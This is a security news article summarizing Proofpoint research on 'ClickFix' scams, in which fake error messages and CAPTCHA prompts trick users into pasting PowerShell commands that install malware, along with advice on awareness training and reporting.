Hackers Exploit ‘ClickFix’ Scams To Spread Malware

Hackers exploit “ClickFix” social engineering, tricking users with fake errors or CAPTCHA to execute PowerShell, spreading malware globally since 2024.

Cybercriminals are increasingly employing a sneaky social engineering tactic called “ClickFix” to distribute malware, targeting individuals’ instinct to troubleshoot problems on their own.

Research from Proofpoint has revealed on Monday the growing use of this method, which has been observed in numerous campaigns since March 2024.

The “ClickFix” technique relies on fake error messages displayed through pop-up dialog boxes. These messages appear legitimate and prompt users to fix an alleged issue themselves, explains Proofpoint.

Often, the instructions direct users to copy and paste a provided script into their computer’s PowerShell terminal, a tool used to execute commands on Windows systems. Unbeknownst to the user, this action downloads and runs malicious software.

Proofpoint has seen this approach used in phishing emails, malicious URLs, and compromised websites.

Threat actors disguise their scams as notifications from trusted sources like Microsoft Word, Google Chrome, and even local services tailored to specific industries, such as logistics or transportation.

A particularly devious variation of ClickFix incorporates fake CAPTCHA challenges, where users are asked to “prove they’re human,” explains Proofpoint.

The CAPTCHA trick is paired with instructions to execute malicious commands that install malware like AsyncRAT, DarkGate, or Lumma Stealer. Notably, a toolkit for this fake CAPTCHA tactic surfaced on GitHub, making it easier for criminals to use.

According to Proofpoint, Hackers have targeted a range of organizations globally, including government entities in Ukraine. In one instance, they impersonated GitHub, using fake security alerts to direct users to malicious websites.

These scams have led to malware infections in over 300 organizations.

What makes ClickFix so effective is its ability to bypass many security measures. Since users voluntarily execute the malicious commands, traditional email filters and anti-virus tools are less likely to flag the activity, says Proofpoint.

Proofpoint emphasizes that this tactic is part of a broader trend in hacking: manipulating human behavior rather than just exploiting technical vulnerabilities. Hackers rely on users’ willingness to solve problems independently, often bypassing IT teams in the process.

To counter this threat, organizations should educate employees about ClickFix scams, reinforcing the importance of skepticism toward unsolicited troubleshooting instructions.

Staying vigilant and reporting suspicious emails or pop-ups can help prevent falling victim to these crafty attacks.